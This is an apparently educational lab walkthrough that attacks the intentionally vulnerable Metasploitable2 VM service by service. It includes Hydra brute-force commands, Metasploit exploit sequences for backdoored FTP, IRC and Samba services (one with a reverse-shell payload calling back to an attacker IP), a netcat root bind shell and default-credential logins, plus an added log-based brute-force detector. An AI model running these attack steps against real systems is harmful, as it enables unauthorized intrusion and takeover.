Metasploitable2

Metasploitable2 Complete Overview

INFORMATION SEEK
Oct 31, 2019

Metasploitable is an intentionally vulnerable Linux virtual machine.

This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.

Installation and configuration

In this guide we exploit Metasploitable 2, a deliberately vulnerable machine built for penetration-testing practice.

Get the Metasploitable2 machine from https://information.rapid7.com/download-metasploitable-2017.html

Installation Process:

  1. Open VirtualBox and click the “New” button to create a new virtual machine.
  2. Type the virtual machine name (Metasploitable2).
  3. Allocate memory (any amount you prefer, but not below 512 MB).
  4. Select “Use an existing hard disk file”.
  5. Select the vmdk file that you downloaded from Rapid7.
  6. Click Create…!!! Metasploitable2 is installed; now it’s time to configure the network settings.

After installation, change the network adapter settings as follows:

In the network settings (Settings/Network/Adapter), select your Ethernet or wireless adapter.

In the Advanced tab, set Promiscuous Mode to “Allow All”.

Boot up the Metasploitable2 machine and log in with the credentials shown on the banner…!!!

Find the machine’s IP address with the following command in the terminal:

ifconfig

That’s all for setup… Let’s start hacking…

Walkthrough

Scanning

Scanning Metasploitable 2

We noted earlier that the IP address of the machine is 192.168.0.130.

Let’s begin scanning with Nmap, which ships with Kali Linux (-sV probes service versions, -p- scans all 65535 TCP ports):

nmap -sV -p- 192.168.0.130

Exploiting each port with different techniques:

21-FTP

Method 1:

Login with Anonymous as username and no password.

If you need more information about anonymous FTP, see https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol

ftp 192.168.0.130

Method 2 :

Brute force with Hydra; you need a custom list of usernames and a list of passwords.

hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V

It takes each username and password from the given files and tries to log in to the target FTP service.

Once you have found the credentials, you can log in directly.

After logging in to a user account, you can get root access through privilege escalation.

Method 3 :

Exploiting FTP through Metasploit framework

Open the Metasploit framework console and search for the vsftpd backdoor exploit:

msfconsole
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130   --> <target IP address>
exploit

Congratulations, you have root access.

22-SSH

Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.

Exploiting SSH in Different Techniques

Method 1

Cracking the username and password with Hydra

Hydra is a tool included in Kali Linux for brute-force attacks. A brute-force attack is a trial-and-error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.

hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
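The Hydra runs against FTP and SSH above both leave the same trace on the target: a burst of failed logins from one source address, sometimes followed by a success. The following is an added example, not code from the original post: it parses constructed auth.log lines (sshd failures and vsftpd failures logged through PAM), counts failures per source in a sliding window, and flags both the burst and any later successful login from that source, which is the guessed credential Hydra would report.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not from the original post); vsftpd logs via PAM.
SAMPLE_LOG = """\
Oct 31 10:00:01 target sshd[2001]: Failed password for invalid user admin from 192.168.0.109 port 51000 ssh2
Oct 31 10:00:02 target sshd[2002]: Failed password for msfadmin from 192.168.0.109 port 51001 ssh2
Oct 31 10:00:03 target vsftpd: pam_unix(vsftpd:auth): authentication failure; logname= uid=0 euid=0 tty=ftp ruser=user rhost=192.168.0.109
Oct 31 10:00:05 target sshd[2004]: Accepted password for msfadmin from 192.168.0.109 port 51003 ssh2
Oct 31 10:30:00 target sshd[2100]: Failed password for msfadmin from 192.168.0.50 port 40000 ssh2
"""
LINE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ (sshd|vsftpd)\S*: (.*)$")
SSH_FAIL = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
SSH_OK = re.compile(r"Accepted \w+ for (\S+) from (\S+) port")
PAM_FAIL = re.compile(r"authentication failure;.* ruser=(\S*) rhost=(\S+)")

def parse(line, year=2019):
    """Return (time, service, outcome, user, src), or None for lines we ignore."""
    m = LINE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    svc, msg = m.group(2), m.group(3)
    for rx, outcome in ((SSH_FAIL, "fail"), (PAM_FAIL, "fail"), (SSH_OK, "ok")):
        r = rx.search(msg)
        if r:
            return ts, svc, outcome, r.group(1), r.group(2)
    return None

def detect_bruteforce(log_text, threshold=3, window_s=60):
    """Flag a source at `threshold` failures within `window_s` seconds, and a
    success from a source still inside such a burst (a guessed credential)."""
    fails = defaultdict(list)  # source address -> failure timestamps in window
    alerts = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        ts, svc, outcome, user, src = ev
        recent = [t for t in fails[src] if (ts - t).total_seconds() <= window_s]
        if outcome == "fail":
            recent.append(ts)
            fails[src] = recent
            if len(recent) == threshold:  # fire once, when the burst first shows
                alerts.append(("bruteforce", src, len(recent)))
        elif len(recent) >= threshold:
            alerts.append(("success-after-bruteforce", src, f"{svc}:{user}"))
    return alerts
```

On the sample the burst from 192.168.0.109 is flagged at the third failure, and the later accepted sshd login from the same address is flagged as a success after brute force; the lone failure from 192.168.0.50 stays quiet.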

Method 2

Open Metasploit framework

Open terminal and type these commands :

service postgresql start
msfconsole
search ssh_login
use auxiliary/scanner/ssh/ssh_login

Select this auxiliary module and see what it requires.

set RHOSTS <target IP Address>   --> in my case 192.168.0.130

Set the prepared usernames list and passwords list:

set USER_FILE <Username file Path>
set PASS_FILE <Password file Path>
exploit

It works through your username and password lists and reports each valid username:password pair; log in with those credentials.

ssh username@targetipaddress

You have user access, which does not allow every task, so try to get root access through privilege escalation.

23-TELNET

Telnet is a simple, text-based network protocol used for accessing remote computers over TCP/IP networks like the Internet. Telnet was created and launched in 1969 and, historically speaking, you could say it was the first Internet.

telnet <target IP Address>   --> 192.168.0.130

By default it shows the Metasploitable 2 banner, which says to log in with msfadmin/msfadmin to get started. Enter those credentials and you are in.

25-SMTP

SMTP is part of the application layer of the TCP/IP protocol suite. Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with the Mail Transfer Agent (MTA) to deliver your communication to the right computer and email inbox.

Method 1:

Using Metasploit

Start Metasploit by executing these commands:

service postgresql start
msfconsole -q
search smtp_version
use auxiliary/scanner/smtp/smtp_version   (or) use 0
show options
set RHOST 192.168.0.130
exploit   (or) run

SMTP stands for Simple Mail Transfer Protocol. It is a server-to-server protocol and keeps a local database of the users to and from which it must send and receive email.

SMTP has a set of commands. We’re going to connect to our target with netcat on port 25 and try to acquire this database of email users.

Open a new terminal and type:

nc 192.168.0.130 25

Now that the connection is established, you can check users with the SMTP commands.

Type: vrfy user

vrfy <username> asks the server whether that user exists (this is not an interactive shell; the server only answers the command).

For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm

Method 2

Using smtp_enum

This can be done with Metasploit:

search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show options
set RHOST 192.168.0.130
exploit

This module uses enumeration to find the list of users on the SMTP service.

Later, netcat can be helpful to get a reverse connection with that user.

139 & 445 NetBIOS-SSN

Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.

We can even use Samba as a server that handles login, authentication and access control for a Windows network.

Search for the exploit:

use exploit/multi/samba/usermap_script

To view the options for the exploit:

show options
set RHOST 192.168.0.130   (Target IP address)

Set the payload:

show payloads
set payload cmd/unix/reverse

Set the required arguments for the payload:

show options
set LHOST 192.168.0.109   (Attacker’s IP address)
set LPORT 4444

Check that all required arguments are filled, then run:

exploit

1099 - Java RMI

Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.

Exploiting java-rmi-server

Search for the exploit:

search java_rmi_server

Choose the exploit according to its rank; for instance, “excellent” works better than “normal”.

use exploit/multi/misc/java_rmi_server
show options
set RHOSTS <target's IP>
exploit

We got access to the target machine.

1524-BINDSHELL

A bind shell is a type of shell in which the target machine opens a communication port, or listener, and waits for an incoming connection. The attacker then connects to the victim machine’s listener, which leads to code or command execution on the server.

Exploitation

It is a root shell, so we can connect to it with netcat:

nc <target ip address> 1524

Congratulations, you are a root user now.

2121-ProFTPD

Before exploiting this port you need login credentials; as we know, the way to get them is the brute-force technique. We can access ProFTPD with telnet; here we use user:user.

telnet <Target IP Address> <Port Number>
USER <username>
PASS <password>

It is a normal user, so try privilege escalation to gain root control.

3306-MYSQL

Method 1:

Search for the module:

search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login

Sometimes there is a chance that MySQL has a blank password, so we can exploit it directly.

Note: by default BLANK_PASSWORDS is shown as false; set it to true.

set BLANK_PASSWORDS true

Method 2:

In this method, we exploit MySQL by connecting with the mysql client, giving root as the username and the target’s IP:

mysql -u root -h <target's IP>

3632-DISTCCD

Distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

Exploiting port 3632 using distcc_exec

Open msfconsole and search for distcc_exec:

search distcc_exec
show options

Set the required arguments for the exploit:

set RHOSTS <target-ip>
exploit

We got shell access… try privilege escalation for higher privileges.

5432-Postgresql

Exploiting PostgreSQL with postgres_payload

Open msfconsole and search for postgres_payload:

search postgres_payload
use exploit/linux/postgres/postgres_payload
show options

Set the required arguments for the exploit:

set RHOSTS <target-ip>

By default, it uses postgres as the username.

exploit

Successfully logged in to PostgreSQL… Let’s get a shell for doing more stuff…

Try to do privilege escalation… Happy learning..!!!

5900-VNC

Open msfconsole and search for the vnc_login module:

search vnc_login
use auxiliary/scanner/vnc/vnc_login
show options
set RHOSTS <targets IP>
set PASS_FILE <filepath that contains passwords>
run   (or) exploit

This method is used to attack VNC software hosted on Linux, Unix or Windows operating systems that has weak authentication.

Try to connect to VNC with that password:

Open VNC Viewer from the terminal, type the IP address and connect.

A login prompt pops up and asks for credentials.

Enter the password and click OK.

Voilaaa…!!! You got access… I know what you are thinking right now.. Don’t mess with the things around.. Happy learning.

6000-X11

The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI-based environment.

The remote X11 server accepts connections from anywhere one can get an Internet connection. It is responsible for access to the graphics cards, the input devices, and the display screen on either a computer or a wireless device.

Exploiting port 6000 using ssh

ssh -X -l msfadmin 192.168.0.122

In the above command, -X enables X11 forwarding over the SSH session; providing the username and the target’s IP gives us a shell.

6667 & 6697 UnrealIRCD

UnrealIRCd is an open-source IRC server, serving thousands of networks since 1999. It runs on Linux, OS X, and Windows.

UnrealIRCd is a highly advanced IRCd with a strong focus on modularity and an advanced, highly configurable configuration file. Key features include SSL.

UnrealIRCd is one of the most popular and full-featured IRC daemons and is used on the largest number of IRC servers.

This server is described as having possibly the most security features of any IRC server.

Protocols used: Internet Relay Chat

Let’s Exploit this IRC Server.

Method 1: on port 6667

search unrealircd
use exploit/unix/irc/unreal_ircd_3281_backdoor
show options

Set the required arguments for the exploit:

set RHOSTS <target-ip>

By default, port 6667 is assigned to the exploit.

run   (or) exploit

Heyyy… We got root… We are living on the edge…

Method 2: On port 6697

Use the above exploit and set the required arguments; this time set the port to 6697:

set RHOSTS <target-ip>
set RPORT 6697

And the second time we also got root… Try to exploit this… Happy learning.

8180-TOMCAT

Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.

Exploiting Apache-Tomcat

It can be completed in two steps.

Open msfconsole and search for tomcat_mgr_login:

search tomcat_mgr_login
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS <target-ip>
show options

The module comes with default username and password lists. After setting the arguments, type exploit (or) run:

run

Take the username and password it finds and give them to the next exploit.

Search for the Tomcat manager exploits:

search tomcat_mgr_upload
use exploit/multi/http/tomcat_mgr_upload
show options

Set RHOSTS, RPORT, HttpUsername and HttpPassword (the credentials from the tomcat login module), then run the exploit.

msfconsole assigns a suitable default payload for the exploit; that’s why we got a Meterpreter session…

8787-Ruby-drb

dRuby is a distributed object system for Ruby. It is written in pure Ruby and uses its own protocol.

No add-on services are needed beyond those provided by the Ruby runtime, such as TCP sockets.

search drb_remote_codeexec
use exploit/linux/misc/drb_remote_codeexec

Set the required arguments for the exploit:

show options
set RHOSTS <target-ip>
exploit   (or) run

Congratulations, you got root shell access… try some shell commands.
